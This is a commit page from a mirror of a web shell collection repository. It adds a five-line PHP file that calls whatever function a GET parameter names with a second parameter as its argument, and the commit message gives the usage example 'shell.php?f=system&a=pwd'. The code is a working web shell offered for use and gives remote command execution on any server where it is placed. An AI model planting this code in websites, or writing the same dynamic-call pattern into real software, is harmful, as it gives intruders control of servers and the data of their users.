mirror of
https://github.com/tennc/webshell
synced 2024-11-24 20:23:04 +00:00
Create 2022-08-26-08.php
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell.php?f=system&a=pwd
This commit is contained in:
parent
6aab7111e9
commit
b37de05dbb
1 changed files with 5 additions and 0 deletions
5
php/2022-08-26-08.php
Normal file
5
php/2022-08-26-08.php
Normal file
|
@ -0,0 +1,5 @@
|
|||
<?php
|
||||
$f = $_GET['f'];
|
||||
$a = $_GET['a'];
|
||||
$f($a)
|
||||
?>
|
Loading…
Reference in a new issue